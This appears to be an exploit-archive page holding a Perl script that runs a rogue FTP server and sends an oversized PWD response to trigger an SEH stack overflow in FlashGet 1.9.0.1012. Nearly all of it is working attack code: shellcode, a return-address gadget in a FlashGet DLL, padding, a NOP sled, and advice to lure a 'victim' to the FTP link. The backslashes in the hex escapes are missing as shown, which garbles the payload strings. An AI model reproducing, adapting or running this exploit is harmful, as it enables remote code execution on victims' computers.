FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit
# Published : 2008-08-15
# Author : SkOd
# Previous Title : FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)
# Next Title : BIND 9.5.0-P2 (randomized ports) Remote DNS Cache Poisoning Exploit

#!/usr/bin/perl
# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploit
# Coded By SkOd, skod.uk at gmail dot com
# Tested over Windows XP sp1 Hebrew
# link your victim to - ftp://localhost/somefile.TORRENT - over internet explorer.

##
# PoC by Krystian Kloskowski (h07) <h07@interia.pl>
# http://milw0rm.com/exploits/6240

##
# special thanks to a friend of mine who helped me

use IO::Socket;

####################################[ Parameters ]########################################
my $SHELLCODE =
"x31xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x6b".
"xa3x03x10x83xebxfcxe2xf4x97x4bx47x10x6bxa3x88x55".
"x57x28x7fx15x13xa2xecx9bx24xbbx88x4fx4bxa2xe8x59".
"xe0x97x88x11x85x92xc3x89xc7x27xc3x64x6cx62xc9x1d".
"x6ax61xe8xe4x50xf7x27x14x1ex46x88x4fx4fxa2xe8x76".
"xe0xafx48x9bx34xbfx02xfbxe0xbfx88x11x80x2ax5fx34".
"x6fx60x32xd0x0fx28x43x20xeex63x7bx1cxe0xe3x0fx9b".
"x1bxbfxaex9bx03xabxe8x19xe0x23xb3x10x6bxa3x88x78".
"x57xfcx32xe6x0bxf5x8axe8xe8x63x78x40x03x53x89x14".
"x34xcbx9bxeexe1xadx54xefx8cxc0x62x7cx08xa3x03x10";
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com

# The Host that will be listen to the Download request from Flashget
my $HOST = '127.0.0.1'; #your own ip
#################################[Don't Edit From Here]#####################################


######################################[Defines]#############################################
my $PADDING_CHAR = "A";
my $PADDING_SIZE = 324;

#The code will return to next_seh_chain so i make it as jump and invalid address
#so it will be decoded as last in chain.
my $NEXT_SEH_IN_CHAIN = "xEBx06xFFxFF"; # JMP +6

#Settings Return Address
my $CUR_SEH_ADDRESS = "x8Bx19x01x10"; 
# Chosen Ret Addr is : 0x1001198B FlashGetFGBTCORE.dll v1.0. 0.36
# 1001198B   5E               POP ESI
# 1001198C   5B               POP EBX
# 1001198D   C3               RETN

# Building SEH Block
my $SEH_BLOCK = $NEXT_SEH_IN_CHAIN . 
				$CUR_SEH_ADDRESS;

#Creating Payload
$PAYLOAD  = $PADDING_CHAR x $PADDING_SIZE;		
$PAYLOAD .= $SEH_BLOCK;
$PAYLOAD .= $SHELLCODE;
$PAYLOAD .= "x90" x 300;	#Putting alot of nops so the code will get Exception that we write after stack is over
							#witch will make it to call our code

$LISTEN_PORT = 21;
##########################################################################
print "# FlashGet 1.9.0.1012 (FTP PWD Response) SEH STACK Overflow Exploitrn";
print "# Coded By SkOd, skod.ukx40gmailx2ecomrn";

my $serverSocket = new IO::Socket::INET (Listen => 1,
					LocalAddr => $HOST,
					LocalPort => $LISTEN_PORT,
					Proto     => 'tcp');	
do
{
	print "rn[~] listening...rn";
	$clientSocket = $serverSocket->accept();
	print "[+] New Connection Recivedrn";

	$clientSocket->send("220 WELCOME!rn");
	$isPayloadSent = 0;
	
	while($isPayloadSent == 0) {
		$clientSocket->recv($recvBuffer,1024);
			print "[~] Recived: " . $recvBuffer;
	
		if($recvBuffer =~ /USER/) {
			$clientSocket->send("331 Password required for l33trn");
		} elsif($recvBuffer =~ /PASS/) {
			$clientSocket->send("230 User l33t logged in.rn");
		} else {
			$clientSocket->send("257 "$PAYLOAD"rn");
			print("[+] The payload has been sent...rn");
			$isPayloadSent = 1;
		}
	}
	
	$clientSocket->close();
	
} while (true);

# www.Syue.com [2008-08-15]